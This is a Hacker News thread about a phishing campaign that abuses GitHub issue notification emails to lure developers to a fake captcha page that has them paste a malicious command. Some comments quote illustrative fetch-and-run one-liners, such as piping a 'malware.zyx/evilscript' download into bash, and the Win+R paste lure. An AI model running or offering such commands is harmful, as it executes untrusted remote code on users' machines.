[HN Gopher] GitHub notification emails used to send malware
___________________________________________________________________
GitHub notification emails used to send malware
Author : crtasm
Score : 436 points
Date : 2024-09-19 21:16 UTC (1 days ago)
(HTM) web link (ianspence.com)
(TXT) w3m dump (ianspence.com)
| qwertox wrote:
| It's worth the read, he shows what they're trying to do.
|
| Easy to be suspicious with the link alone, but its fun to see
| someone digging into it.
| slig wrote:
| Seriously how hard it can be for GH to detect that a randomly
| just created account is creating issues, with the same text,
| containing a link inside?
|
| I got dozens of such spam during a whole day.
| nine_k wrote:
| Once they introduce that, the texts will become more varied,
| and links, possibly, too.
|
| There are more possible next steps, which would make creating
| accounts for spamming more expensive, but they will also
| inconvenience well-meaning new users.
|
| I suspect that unless the problem of malicious spam from GitHub
| comments becomes rather serious, acting on the case by case
| basis may be the correct solution.
| klabb3 wrote:
| > Once they introduce that, the texts will become more varied
|
| I've said for some time that, while LLMs are varying levels
| of useful for a lot of people, it's practically tailor made
| for spam and phishing. I can't think of any "product-market-
| fit" as good as that.
|
| For instance: Imagine combining a leak of personal data from
| your favorite data broker (who knew that this would come back
| and bite), with an LLM to bypass spam filters and perform
| phishing attacks with eerie believable social engineering
| behind it. All for next to no money.
| elashri wrote:
| > The attacker quickly deletes the issue
|
| I realized I have never deleted an issue I started but doesn't
| people with admin access the only with ability to delete the
| issues on a repo? [1]. So actually there is a trace for that
| issue in the repository. Same thing for Pull requests.
|
| [1] https://docs.github.com/en/issues/tracking-your-work-with-
| is...
| 8organicbits wrote:
| Maybe GitHub had already deleted it as malicious, but the email
| was already delivered.
| tonygiorgio wrote:
| I got this on two org repo's yesterday. About an hour after
| the email, I checked and it was gone. I wanted to report it,
| even though GitHub scam reports are so very unsatisfying
| (weeks go by, then random email about how they took some
| action).
|
| One very simple measure I hope they implement is just not
| sending emails for unverified spam like this. I'd argue a
| majority of issues or comments do not need instant emails.
| Even one hour delay could help in combating abuse like this
| if they had any sort of reasonable moderation rules.
| latexr wrote:
| > GitHub scam reports are so very unsatisfying (weeks go
| by, then random email about how they took some action).
|
| Either you're unlucky or I'm lucky, I've reported scammers
| to GitHub multiple times and always got a response in a
| couple of hours.
| elashri wrote:
| I reported spam comment and they acted in less than an
| hour. I reported the exact spam comment by another user
| in the same day and they took 3 months to act. It is a
| very random process.
| cwizou wrote:
| Same here, I get frequent spam on one specific (very
| popular) issue, and they always take care of it within an
| hour or two. I hide the spam myself to protect the users
| on the web (I can't do anything about the phishing emails
| though that gets sent [by default I think ?]), and their
| moderation wipe the spam account and sends a quick email
| to confirm.
|
| Usually it's a new user who clones a few repositories to
| pass whatever mitigation they have.
|
| Always get a "lots of reports, this may take a while"
| email first though. I don't think I ever not got that
| one.
|
| I think there's something to be said about sending - by
| default - user generated content by email automatically
| if you've replied once to a thread. Lots of bad defaults
| here imho.
| edm0nd wrote:
| Repo owners can also edit the title and text of your Issue as
| well.
| theamk wrote:
| Do people really fall for scam like that?
|
| First, I assume the author knows the email came from github, as
| the screenshot does not show this very clearly. If that's the
| case:
|
| Red flag #1: email links to a variation of real domain. If you
| don't have information on who github-scanner.com is, it is pretty
| safe to assume it's a scam , just because it sounds like a real
| website.
|
| GIANT Enormous Huge Red Flag #2: captcha asks you to types
| command in shell. I have no comment on how naive one must be to
| do this.
| thephyber wrote:
| It's a numbers game.
|
| Nobody is perfect. The more features of credibility, most
| likely there will be a higher percentage of conversions. But
| not everybody has excellent vision, is not time-pressured, and
| is not tired/exhausted.
|
| There are lots of conditions that make otherwise difficult
| fraud targets more easy to trick.
|
| And if it can be done at large scale / automated, then small
| conversion rates turn into many successful frauds (compromised
| accounts).
| szundi wrote:
| Thanks for this summary. People often forget they (hopefully)
| have grandmas and themselves sometimes making mistakes as
| well for -- whoever knows what reason. Sometimes.
| generic_dev_47 wrote:
| Agree, I once fell for a scam that I think I otherwise
| wouldn't because of string of circumstances: Being tired and
| stressed, it being Christmas time and I had actually ordered
| stuff but also because I had just upgraded iOS to the first
| version that put the address bar in Safari on the bottom of
| the screen instead of the top so I forgot to check the
| domain!
|
| I've since changed the address bar back to the top...
|
| In the end I didn't loose anything but it was a good wakeup
| call for sure.
| acomjean wrote:
| I think they're hoping for coincidences and the higher the
| numbers the more likely they'll find one.
|
| I got a real letter from the IRS two days before I got the
| scam message on my answering machine. The timing was uncanny
| and I might easily have fallen for it, had I not already
| dealt with it.
|
| It's the same for the Chinese language calls, if you speak
| Chinese it really resonates.
|
| There was a scam in the 90s where you'd call a number and
| they'd give you sports betting advice. They'd do it for free
| as a promotion trying to sell their service when you won.
| They'd tell half the callers bet team A and the other half
| team B. The numbers made it work.
|
| "Splitting games 50-50 like that--known in the biz as
| "double-siding"--is the oldest trick in the handicapper's
| very thick book. That way he knows he has at least some happy
| customers coming back. "
|
| https://vault.si.com/vault/1991/11/18/1-900-ripoffs-the-
| ads-...
| ceejayoz wrote:
| Email from a different domain is unfortunately quite common.
| Citi and PayPal both do it for some emails. Pisses me off every
| time.
| szundi wrote:
| I just don't get it, how hard it could be? How expensive this
| could be? Because lots of times they just pay these damages
| to the customer, because no one knows how this very secure
| credit card data was compromised. This baffles me. Someone,
| please enlighten us, there must be a valid reason - at least
| from an angle.
| sofixa wrote:
| Having a bunch of different domains can serve multiple
| purposes.
|
| In GitHub's case, they already have githubusercontent.com
| to avoid serving untrusted stuff from their own github.com
| domain.
|
| Sending marketing or security scanner (potentially very
| spammy) notification emails from separate domains can help
| with reputation too, to avoid your main domain getting
| marked as spam.
|
| These are all legit; Amex having 20 different of domains,
| half of which smell like phishing, and still sending emails
| from other domains is just incompetence. Something like
| marketing people or someone dealing with strategy deciding
| to do stuff in a certain way, with nobody technical in the
| room to tell them why that would be a problem. As an
| example, a friend of mine's organisation wanted to do a
| SaaS website for their niche, and a separate website to
| advertise the SaaS (separate domain, visual identity,
| everything).
| progval wrote:
| My theory for most of these cases: they would need
| permission from who knows what department(s) to set up a
| subdomain of the main domain for their project, and it's
| easier to just purchase a new domain for the
| team/project.
| m3047 wrote:
| Keep your SPF simple. Otherwise, make sure it works. Aaand,
| how many people actively monitor their DNS infrastructure?
| mewpmewp2 wrote:
| I can understand clicking on the link while not paying
| attention, but I do wonder how many people who are signed up on
| GitHub would follow through with pasting this command. I could
| understand if elderly non technical people might follow up with
| it, but this one, I wonder what the rate is.
| hmottestad wrote:
| Just clicking on the link might be enough. Maybe you have a
| slightly outdated browser with a known vulnerability. Maybe
| you're holding off on installing an update just to be sure it
| won't break anything.
|
| And even if everything is up to date Pwn2Own regularly shows
| that having a user browse to a website is enough to get root
| access. Thankfully most people don't have to worry about this
| since they are unlikely to attract the attention of someone
| with that level of resources.
| hmottestad wrote:
| If I had those kinds of resources I might even put a
| captcha on the site that asks the user to do something
| incredibly stupid just to make them think they were in the
| clear.
| mewpmewp2 wrote:
| Yeah, I think the barrier to get people to just click on a
| link (outside of e-mail as well) is very low, so that would
| be easy to affect anyone.
| mixtureoftakes wrote:
| Honestly i would have typed commands in shell if "captcha"
| asked me for it. Just to see the scale of outcome's awfulness.
|
| I'm almost bored enough to just start installing weird malware
| for research and funsies
| fijiaarone wrote:
| Everyone has been trained for years to do this:
|
| curl http://obscure.url?random-string | sh
| fijiaarone wrote:
| or even this:
|
| git clone http://github.com/unknown/repo.git && cd repo &&
| npm install
| darkwater wrote:
| Even worse:
|
| $ svn checkout
|
| $ ./configure
|
| $ make
|
| # make install
| dullcrisp wrote:
| If there were a legitimate looking GitHub how-to page that
| asked me to do that, I can see myself doing it. Fortunately,
| I ignore all security issues on my repositories.
| ToValueFunfetti wrote:
| Security by lack thereof
| kurisufag wrote:
| people make a lot of noise about piping into shell, but even
| if the instructions were
|
| wget random.club/rc-12-release.sh
|
| chmod +x ./rc-12-release.sh
|
| ./rc-12-release.sh
|
| almost nobody would actually read the script before running
| it
| dullcrisp wrote:
| Well yeah, if your intention is to install software from
| random.club on your system, what would be the point of
| checking the installer script? The worst thing it can do is
| the same thing you want it to do.
| umanwizard wrote:
| Yes, which is why complaining about curl | sh is silly.
| dullcrisp wrote:
| I'm not disagreeing.
| umanwizard wrote:
| No they haven't, they've been trained to do
| curl https://url-of-well-known-project | sh
|
| I may not trust the owners of a random domain, but I
| certainly trust the owners of rustup.rs not to do anything
| intentionally malicious.
| guappa wrote:
| Microsoft owns more domain names than the amount of neurons
| in the brain.
| account42 wrote:
| Then you are more trusting of the Serbian National Internet
| Domain Registry than you should be.
| micw wrote:
| Another red flag. I cannot take any project serious that has
| this on its documentation.
| kadoban wrote:
| You prefer that they wrap it in an .msi file and put it on
| that same website? What do you think the advantages of that
| are?
| d0mine wrote:
| what is the more secure way in you opinion? What is the
| weak link here? TLS transport? possibly compromised
| hosting/codebase? trust in app authors? not reading the
| shell script? checking a signature of some file?
| micw wrote:
| My issue is the bypassing of the systems package manager.
| Doing so will result on files spread somewhere over the
| system. How do you uninstall such thing properly? How do
| you update (or even know) it's dependencies? Will it
| break because I uninstall or update one of it's
| dependencies?
|
| Linux has a very good package management for many years.
| I see absolute no reason to break this by creating shell
| installers.
| umanwizard wrote:
| I guess you don't think the Rust programming language is a
| serious project, then?
| guappa wrote:
| I mean they even named the website cargo, after cargo
| culting! (jk)
| lgats wrote:
| re #1: the email could link to a github pages site hosting the
| same malware...
|
| re #2: it doesn't really have you typing into shell, 'just
| paste'
| latexr wrote:
| A few weeks ago someone opened an issue in one of my repos. _In
| under a minute_ two accounts replied with links to file lockers
| asking the user to download and try some software to solve
| their issue. No doubt it was malware. I promptly deleted the
| comments and reported the accounts to GitHub.
|
| I wouldn't have fallen for such an obvious ploy, but the
| original asker seemed like they weren't particularly technical,
| judging by the sparse GitHub history and quality of the
| question. I could see them perhaps falling for that if they
| were uncritical and too eager to try anything.
| zahlman wrote:
| Not only does it ask you to copy and paste a command in shell,
| but Windows apparently warns you that it will run with admin
| privileges.
|
| Aside from that:
|
| > Nowhere in the email does it say that this is a new issue
| that has been created, which gives the attacker all the power
| to establish whatever context they want for this message.
|
| What about the non-user-controlled "(Issue #1)" in the subject
| line?
| eviks wrote:
| > Red flag #1: email links to a variation of real domain
|
| It's too common, MS also does this, to be a red flag
| sureglymop wrote:
| Just to let you know, even github themselves use multiple
| domains instead of just subdomains of github.com (see
| githubnext.com).
|
| So, I wouldn't blame the victims here if the service itself
| does not realize why that is not such a good idea.
| 8n4vidtmkvmk wrote:
| Yeah.. I don't like when companies do that. I usually Google
| the domain first to see if it's legit, but even that isn't
| foolproof.
| thih9 wrote:
| If this was within my first year of owning a GitHub account, I
| would absolutely fall for this.
|
| It's not much different from setting up your ssh key -
| something that you have to do; and new users also go through
| this workflow by copy pasting commands that GitHub sends them.
| jampekka wrote:
| A prime example how all the paranoid security hoops can
| easily make things more insecure in aggegate.
|
| Since Microsoft embracing and extending it, GitHub has become
| one of the worst offenders.
| obscurette wrote:
| I'm old enough to remember ILOVEYOU. During years after that I
| have seen millions and millions thrown into educating users not
| to click on wrong things.
|
| Last month I was in conference where the keynote was from CEO
| of cyber security company. The whole point of the speech was
| that we need more money because in some cases more than 80%
| users still fall into email scams. My very serious question to
| the speaker was - if after many millions and almost 25 years
| more than 80% users still click on wrong links, then maybe we
| do something really wrong?
| bugtodiffer wrote:
| We are, but people want convenience.
|
| Try to get a company built around Word to use another tech
| that doesn't requires running unsigned macros from emails...
|
| You literally can't, they lough at you for saying things like
| "don't use Microsoft"
| mnau wrote:
| We are not not doing anything wrong, but we are completely
| neglecting the attacker side.
|
| All our actions are defensive.
|
| Look at our physical security. Basically nothing is
| reasonably protected. 99% of stuff (buildings, locks) can be
| broken into with tools available in any home depot.
|
| The key reason why it doesn't happen that much is because
| it's possible to find the attacker.
|
| Why can any scammed just create a website without any
| traceability? It wouldn't be foolproof, but it would raise a
| bar.
| chii wrote:
| > Why can any scammed just create a website without any
| traceability?
|
| because jurisdictional challenges.
|
| Not to mention that this very same traceability would be
| abused by some other authoritarian gov't to track down
| dissidents for example.
|
| There's no real way to systematically have good security,
| if the human element is the weakest link tbh. Securing
| windows is not a technical problem, but a social and
| educational one.
| mnau wrote:
| More like no will.
|
| Does the domain/server implements required level? No?
| Block connection. Dtto email with automatic response.
|
| Is your IP in a botnet? Cut it off.
|
| Edit: I already get blocked connection (on target site)
| because EU regulation is too onerous. I get reminded on
| basically every Google search I am being censored (Some
| results may have been removed under data protection law
| in Europe).
|
| Completely doable.
| GTP wrote:
| > I already get blocked connection (on target site)
| because EU regulation is too onerous
|
| More like "we want to track every single user coming to
| our website without giving them the option to not be
| tracked".
| mnau wrote:
| You can serve consent form only to the connections from
| EU.
|
| I have been part of se several GDPR compliance projects
| and it's the other stuff that's the problem.
|
| Data protection officer (recurring cost, even though it
| is only a part of a job, not full time position) , user
| data deletion and user data take-out. Compliance is not
| free. If system wasn't designed from the beginning, it's
| really expensive to add it.
|
| Restore from backup after disaster recovery - make sure
| you anonymize/delete people who were deleted after backup
| was made.
|
| BTW, IP address is PII, so...
|
| Honestly, it would be cheaper to buy everyone in EU VPN.
| janc_ wrote:
| It's actually very simple & cheap to be compliant: stop
| tracking EU citizens.
| GTP wrote:
| > You can serve consent form only to the connections from
| EU.
|
| Why? While I get that, if tracking is part of someone's
| business model, they want to track as many people as
| possible, I doubt it would be illegal to give also people
| that aren't in the EU the option to not be tracked. If it
| really would be so expensive to be compliant while also
| differentiating between users connecting from the EU and
| users connecting from outside the EU, why not just give
| everyone the option to choose if they want tracking as a
| measure to cut compliance cost?
| guappa wrote:
| What do you suggest? Bomb even more countries?
| mnau wrote:
| You don't need to bomb anyone.
|
| Add IP rules at cables inside and out of let's say EU and
| block it there.
|
| Same way we deal with any non-compliance thing. You can't
| import it.
|
| Your server/domain doesn't satisfy requirments. Either
| the originator complies or not (e.g. through trusted
| third party).
| guappa wrote:
| Because ip geolocation has always been reliable and never
| inaccurate?
| mnau wrote:
| No geolocation is needed. And even if it was, these are
| technical problems, inherently solve able.
|
| So far, we are building walls and replacing mortar with a
| new one, while attackers bombard us with complete
| impunity. This is never going to work.
|
| This would of course need new extensions /protocols (even
| simplest would require authentication envelope around
| encrypted traffic).
| guappa wrote:
| The problem is that you think a societal problem can be
| solved technically.
| mnau wrote:
| The whole point is to move from technical solution (i.e.
| current approach) to legal one.
|
| Not a single response had anything to do with either
| problem ITA or my comment.
|
| I am not sure if you are troll, 10 y/o or gpt1, but have
| a nice day.
| unethical_ban wrote:
| Do you think people should have to get permission to host a
| server on the internet?
| guappa wrote:
| They measure by clicks... but clicking a link doesn't mean
| you'll follow through and put in your username, password, and
| 2fa code.
|
| Ultimately he's a businessman seeking for more money. Doesn't
| mean he can be trusted.
| kayodelycaon wrote:
| In my opinion, these products are nothing but scams. I
| can't use any links from work emails on my phone because I
| can't see the domain of a link without previewing the page.
| IT told me I needed to change system-wide settings to
| disable previewing webpages in every app on my phone. Not
| happening.
|
| Fortunately, my work email supports IMAP, so I can use a
| script to scan my inbox for fake phishing emails and delete
| them.
| edelbitter wrote:
| They do. Just after seeing instructions to run this, and
| complying:
|
| > curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs |
| sh
|
| (Yup, .rs is the ccTLD for the Republic of Serbia, of former
| SFR Yugoslavia)
| chii wrote:
| > captcha asks you to types command in shell. I have no comment
| on how naive one must be to do this.
|
| someone who knows computers (like a programmer) might not fall
| for it, but people who do not know computers, but is dabbling
| could easily fall for it.
|
| The copied command specifically puts in a "user friendly
| captcha message" into the end, to overflow the run dialog
| textbox, so that a user who obeyed the instructions will see
| something vaguely resembling valid captcha verification:
| # " ''I am not a robot - reCAPTCHA Verification ID: 93752"
|
| Phishing and scams are not about catching out pros, but
| catching out "normies".
|
| It's quite scary that the scammers have put thought and effort
| into the method of infiltration, because this is "novel" as far
| as i have heard.
| Stratoscope wrote:
| Red flag #3: "Github Security Team"
|
| A legitimate GitHub email would never mis-capitalize the
| company name like that. It would be GitHub, as shown in the
| footer that the attacker does not control.
|
| OTOH, this is a very common mistake. The article alternates
| between the correct GitHub and the incorrect Github. So it
| would be easy to not notice that error.
| antimemetics wrote:
| You assume the scammers want everyone to fall for this trick.
|
| The reality is different - they leave these huge red flags so
| that people who aren't very bright or careful will fall for it.
|
| That is the same reason why scammers put spelling mistakes in
| emails - not because they don't know how to use spellcheck, but
| because they want to filter out those who would spot these
| mistakes.
|
| They want to scam careless, gullible, ,,stupid" people, not
| someone who is careful enough to spot security red flags.
| godelski wrote:
| > Do people really fall for scam like that?
|
| I routinely get people opening issues on my projects asking
| where the source code is or how to fine tune their models on
| different data or even how to install pytorch.... There's a lot
| of people on GitHub that don't know the first thing about
| coding. There's a lot of people on GitHub that don't know how
| to use Google... This even includes people with PhDs...
| NeveHanter wrote:
| I've also seen an issue on GitHub asking project author to
| add an entry in README.md with instructions on how to clone
| the repository...
| tom_ wrote:
| Actually worth doing if the repo uses submodules.
| godelski wrote:
| https://lmgtfy.click/?q=How%20do%20I%20clone%20a%20reposi
| tor...
| keybored wrote:
| The naive way in this case wouldn't be to make an issue:
| How do I clone this repo? I see it has submodules
|
| The naive way would be to just clone the repo without any
| (apparently) options.
|
| I can attest to this because that's probably what I would
| do.
|
| The readme would not resolve a problem that someone
| knowingly had. It would resolve an unknown upcoming
| problem.
| prmoustache wrote:
| > GIANT Enormous Huge Red Flag #2: captcha asks you to types
| command in shell. I have no comment on how naive one must be to
| do this.
|
| I guess critical thinking of devs and wannabee devs has been
| softened by all the `curl <script> | bash` installation
| instructions.
| d3nj4l wrote:
| Yeah exactly, I do that all the time when filling captcha!
| Dibby053 wrote:
| >GIANT Enormous Huge Red Flag #2: captcha asks you to types
| command in shell. I have no comment on how naive one must be to
| do this.
|
| Funnily enough there's at least one legit captcha that has you
| do this: if you have JavaScript/WASM disabled it gives you the
| option of running the anti-DDOS proof-of-work in a shell and
| pasting the result in a textbox.
| maicro wrote:
| All valid points, but I will say services don't help in this
| situation - I received an email from @redditmail.com recently,
| which is real and part of reddit but feels off on first glance.
|
| Couple that with gmail having no way to show the full email
| address (by default - I know you can hover, etc.), rather than
| the sender-provided "sender name", and my false-positive rate
| for at least double checking and confirming the sending domain
| is kinda high...better that than a bunch of false-negatives of
| course.
| voytec wrote:
| > Do people really fall for scam like that?
|
| Yes. It wouldn't be a thing otherwise. I know at least two
| fairly intelligent people, one literally being a Mensa member,
| who fell for sextortion emails and got their files encrypted.
|
| Scareware is based on social engineering, and is crafted to
| trigger emotional response, not educated one.
| me-vs-cat wrote:
| > Do people really fall for scam like that?
|
| You should put a "voice activated" sticker on a random break
| room appliance (toaster, water/ice dispenser, microwave, coffee
| machine, ...).
|
| Don't use strong adhesive if your desk is within hearing
| distance.
| kyledrake wrote:
| I received one of these notifications this morning and promptly
| ignored it. I had to laugh because it was about this repo
| specifically: https://github.com/kyledrake/theftcoinjs
| drexlspivey wrote:
| If your method of infecting your victim is having them paste and
| run a random command on their terminal, software developers is
| probably the worst group of people to be targeting.
| arccy wrote:
| you'd be surprised at the quality of the average dev
| thephyber wrote:
| "Curl pipe sh" would like to have a word...
|
| I think you are painting with a broad brush.
| vultour wrote:
| This is no different from installing a random package through
| a package manager. If you're running "curl pipe sh" because
| an email told you to, that's on you.
| craftkiller wrote:
| No it isn't. Package managers verify the cryptographically
| signed package. That means the package can be built on a
| secure server, and then if a mirror becomes malicious or
| gets compromised, the malicious package won't have a valid
| signature so the package will not be installed. Running
| curl and piping it into sh means that not only could a
| malicious mirror or compromised server execute anything
| they want on your computer, but they could even send a
| different script when you curl it into sh vs when you view
| it any other way, making it much harder to detect[0].
|
| [0] https://web.archive.org/web/20240213030202/https://www.
| idont...
| dylan604 wrote:
| I think the npm repos would like to have a word with you.
| Sure glad we've never had a cryptographically signed
| malicious package delivered via npm install
| craftkiller wrote:
| Thats like not wearing a seatbelt because you can still
| be crushed by a truck. Don't let perfect be the enemy of
| good. Package managers prevent some attacks that are
| possible via curl | sh. Some other attacks are still
| possible. It is still better than not cryptographically
| verifying the package.
| dylan604 wrote:
| That's like moving the goal posts so you can still try to
| have a point after the fact. Your comment suggested that
| package manager was secure while curl | sh isn't because
| the package manager won't have a valid signature. That's
| only if the package manager was compromised. A code
| package that is built to be malicious will still get
| signed by your manager. Only now, people think they are
| secure because it was signed.
| bugtodiffer wrote:
| Couldn't I just publish a package? Then there's malware
| on the package manager wohooo
| _hyn3 wrote:
| The tremendous number of attacks delivered via trusted
| package repos versus the number of _widespread_ attacks
| via curl | sh (probably roughly zero) means that,
| theories aside, one of these is far more commonly abused
| than the other.
| thephyber wrote:
| Both are examples of developer-types doing risky things,
| which was my point and also supports my point that
| developers are not exclusively better secured than non-
| developer types.
| lukan wrote:
| My only encounter with this is, that I am annoyed if I open web
| dev tools on a new browser profile/guest profile, but am
| interrupted in my workflow because first I have to type "allow
| pasting" every single time. (Why I do this quite often? To be
| sure to have a clean state when debugging a web app) And all
| this, because some people cannot think, before they follow
| obscure instructions send to them by a untrusted party?
|
| Why can't we have nice things again? Because of abusers yes,
| but also because of sheep people.
| TheRealPomax wrote:
| You just need a handful of people to fall for it, and a
| population of a hundred million daily active users on GitHub
| means there are _always_ a handful of people to trick.
| jeroenhd wrote:
| Hard disagree. Developers aren't magically tech wizards, many
| of them will struggle to install a printer. I've seen one spend
| fifteen minutes on adding a keyboard layout in Windows last
| week (granted, the process was very unintuitive).
|
| It's this "I'm a developer, I'm too smart to fall for phishing"
| mindset that makes developers an excellent target for malware.
| cebu_blue wrote:
| I don't understand whats special about this particular attack!>:(
| When I read the title I thought some automated GitHub emails were
| forged to sneakily point to a fake GitHub site or something. An
| obvious (for tech-savvy users) link pointing to an obvious
| malware (please copy and execute this code to solve the captcha.)
| If the people you are targeting fall for this why not send an old
| fashioned spam email with fake headers or via some hacked
| Wordpress installation? I guess using GitHub notifications is
| creative but in the end not much different than like sending a
| facebook message with a fake link, and the user getting an email
| notification with the message? The analysis of the malware once
| downloaded was certainly interesting, though!:)
| fijiaarone wrote:
| This is neither hijacking notifications nor sending malware. This
| is someone including a link in a message on a ticketing system
| open to the public, and then someone clicking on the link and
| downloading malware.
| crvdgc wrote:
| Months ago I got crypto ads through a similar approach, some fake
| new account @-ing hundreds of users in an issue and then the
| issue is removed. The net effect is that the ads become
| unblockable in your email box (It's from GitHub!).
|
| Maybe devs' target value in general has growing to a point where
| the openness of the system is more of a vulnerability than
| service.
| keyle wrote:
| Press Win+R, CTRL+V <enter>
|
| From captcha to gotcha.
|
| I could see junior developers falling for this. Hey it's Github,
| it's legit right? We get security notifications every second
| months about some lib everyone uses etc. "Oh
| look, captcha by running code, how neat!"
|
| I don't think webpages should be able to fill your copy/paste
| buffer from a click without a content preview. They made it
| requiring a user action, such as clicking, thinking that would
| solve the problem but it's still too weak. That's problem number
| 1.
|
| People need to stop actioning any links from emails and/or
| believing that any content in an email has legitimacy. It
| doesn't. That's problem number 2.
|
| Problem number 3, Windows still let you root a machine by 1 line
| in powershell? What the @$$%&%&#$?
|
| Github might need to stop people putting links in issues without
| being checked by automated services that can validate the content
| as remotely legitimate. They're sending this stuff to people's
| email, don't tell me they're not aware this could be used for
| fishing! That's cyber security 101, in 2015.
|
| Finally, Github, in being unable to act on the above, may need to
| better strip what they email to people, and essentially behave
| more like banks "you have a new issue in this repository..." and
| that's that. You then go there, there is no message, ok great.
| That would have taken care of this issue...
|
| It seems Github needs to graduate a bit here.
| ocdtrekkie wrote:
| I've started disabling the Run dialog for non-technical users,
| but unfortunately a GitHub attack targets users who likely have
| a real use for it sometimes.
|
| The clipboard strategy feels like it should be easy to block
| too, most scammers just convince people to type a well-obscured
| URL into the Run dialog manually over the phone.
| chii wrote:
| > The clipboard strategy feels like it should be easy to
| block too
|
| yea, the browser should actually have each site ask for
| permission to modify the clipboard imho.
| bradjohnson wrote:
| That might add another step but I think it is unlikely to
| help reduce the number of victims. If someone is willing to
| bring up the run prompt and paste whatever they have in the
| clipboard they are also likely to be social engineered into
| clicking yes on a dialog that tells them to allow clipboard
| modification.
| justsomehnguy wrote:
| > Problem number 3, Windows still let you root a machine by 1
| line in powershell? What the @$$%&%&#$?
|
| _sigh_ It needs to be run under an account with admin
| privileges for that. The shield on the "Run" dialog screenshot
| clearly indicates what it was taken under a user with admin
| privileges and UAC disabled.
|
| Come on, now cry what Linux still let you root a machine by 1
| line in curl malware.zyx/evilscript | bash.
| rl3 wrote:
| > _Come on, now cry what Linux still let you root a machine
| by 1 line in curl malware.zyx /evilscript | bash._
|
| Excuse me, but some of us prefer to let evil scripts root our
| machines via pure _sh_ , thank you very much.
| koolba wrote:
| Glad I'm not the only one thinking about POSIX compliance!
| koolba wrote:
| > ... by 1 like in curl malware.zyx/evilscript | bash.
|
| Making the script POSIX compliant would allow hacking
| computers without bash. Then you can pipe it into just "sh"
| which is guaranteed to be on the PATH.
| chii wrote:
| > it was taken under a user with admin privileges and UAC
| disabled.
|
| you will have to accept that users either ask this UAC to be
| turned off, or it gets turned off by the original installer
| of the windows for the user (presumably non-technical user).
|
| It's like telling traffic accident sufferers that they
| should've put on a seatbelt. True, but pointless.
| Dalewyn wrote:
| >Windows still let you root a machine by 1 line in powershell?
| What the @$$%&%&#$?
|
| You say it's a problem, I say it is a virtue.
|
| We can "root" Windows because we _are_ root, specifically a
| user in the Administrators group because the first user account
| configured by Windows Setup is always an administrator account.
|
| This is a virtue. We can do whatever we want with the computer
| we own and use. This is freedom par excellence that literally
| every other operating system family today wishes they could do
| without getting shouted down.
|
| In an era of increasingly locked down operating systems that
| prevent us from truly owning our computers, _administering_
| them, Windows just lets us do that. I hope to god this never
| changes.
| darby_nine wrote:
| > This is a virtue. We can do whatever we want with the
| computer we own and use.
|
| You certainly don't need to do it with a single line of
| powershell though. At least, not without intentionally opting
| into it. For the most part on a daily basis I just want to
| _use_ my computer, not _modify_ it.
|
| Anyway, at the very least most functionality should be
| sandboxed so that if someone does something without your
| consent, it can't do much damage. Though this wasn't the
| original intention, leveraging user privileges and sandboxing
| applications by user is an effective way to do this.
|
| Besides what kind of moron would choose proprietary software
| if they wanted control of their machine? It's inherently a
| contradictory impulse.
| lyu07282 wrote:
| > At least, not without intentionally opting into it.
|
| just to clarify in Windows, users with administrative
| privileges will in theory still ask the user to opt-in
| every time before any process is elevated to administrative
| rights. Its just that Windows security is so awful that
| people have found many different creative ways around it
| over the years, but those are (sometimes) getting patched
| by Microsoft so they are considered "bugs".
|
| For example a process stores its executable path in memory
| writable by itself, so you could start a process that
| replaces its executable string to "C:\Windows\explorer.exe"
| and it would (for whatever reason) bypass the "ask for
| administrative rights" dialog popup. This is the sort of
| "security" that Windows is built around to its very core.
|
| https://github.com/hfiref0x/UACME
|
| > "This tool shows ONLY popular UAC bypass method used by
| malware, and re-implement some of them in a different way
| improving original concepts. *There are different, not yet
| known to the general public, methods. Be aware of this;*"
|
| (also i think you are responding to a troll btw)
| Dalewyn wrote:
| >(also i think you are responding to a troll btw)
|
| You would be wrong.
| lyu07282 wrote:
| thats exactly what a troll would say though :p
| AdieuToLogic wrote:
| >>Windows still let you root a machine by 1 line in
| powershell? What the @$$%&%&#$?
|
| > We can do whatever we want with the computer we own and
| use.
|
| There is a difference between what an owner of a computer can
| and should be able to do, verses what an arbitrary actor can
| do to a computer they do not own through subterfuge. It is
| the responsibility of an Operating System to facilitate the
| former and guard against the latter.
|
| MS Windows has a poor history of being able to do either.
| Dalewyn wrote:
| Remember the old saying: With great power comes great
| responsibility.
|
| Windows just lets us do anything and everything, and it's
| up to us how we want to secure it if at all.
|
| Every other operating system family tries to realize
| security by straight up locking the user, the
| administrator, out of his own computer. They still get
| compromised, by the way.
|
| Windows has absolutely succeeded and continues to succeed
| in enabling the user, including security if he so desires.
| This is the reason Windows became the dominant desktop OS.
| The others? Nope on both counts. The Linux world in
| particular always screams about user freedom, yet
| ironically it's Windows and its community that actually
| makes that freedom a reality.
|
| Once more: I hope to god this never changes.
| nativeit wrote:
| This is a wild take. Would you mind expanding a bit on
| the oppressive, locked down ecosystem that's choking the
| free expression of Linux users?
| Dalewyn wrote:
| For starters it's security theater, given everyone and
| their dog prefixes sudo to all commands without much
| thinking. There are also some who just smash in _sudo -i_
| as the first thing they ever do upon boot (guilty as
| charged) because they suffer RSI from typing sudo a
| trillion times.
|
| There's also this impression that the operating system is
| just secure and you as the user are just protected like
| it's a law of physics. Spoiler alert, you are not and
| it's not a law of physics either. It's still your
| responsibility to secure the computer if you so desire
| and otherwise not do dumb shit like copypasta'ing
| commands from the internet.
|
| I'm not even going to get into the politics that are
| package managers and repos, that's just straight bullshit
| that has more to do with human nature than computer
| science.
|
| Speaking of politics, most of the FOSS community at large
| _hates_ users using and administrators administering
| computers how they want. You must subscribe to the One
| Libre Way(tm) or you are a heathen doing it wrong. So
| much for freedom. The Windows community meanwhile is
| mostly composed of jaded engineers who are just happy to
| see others get stuff done and get through another day in
| one piece.
|
| Windows from the start places the user at the controls
| with mostly no child safety locks in place (and you can
| remove what is there easily, eg: UAC), and with that
| power you have to accept that if you end up hosing the
| system the problem is you because Windows doesn't even
| pretend to really protect you.
|
| Having the sheer power to hose Windows with a single
| Powershell line is what freedom is. Freedom is both
| delightful and horrifying.
| AdieuToLogic wrote:
| What I am writing below I mean genuinely, without malice,
| and in the hope it helps dispel some of the conclusions
| you have expressed above, if not for Linux itself (which
| I do not normally use) then for other Unix operating
| systems such as FreeBSD[0].
|
| > For starters it's security theater, given everyone and
| their dog prefixes sudo to all commands without much
| thinking.
|
| Setting aside the hyperbole, such as "everyone and their
| dog prefixes sudo to all commands" and "most of the FOSS
| community at large hates users", user/group/other
| permissions are one part of security in depth. Excessive
| use of _sudo_ is indicative of an improperly configured
| system or use of software which lacks understanding of
| the OS which runs it. Both are causes for concern.
|
| > Windows from the start places the user at the controls
| with mostly no child safety locks in place ...
|
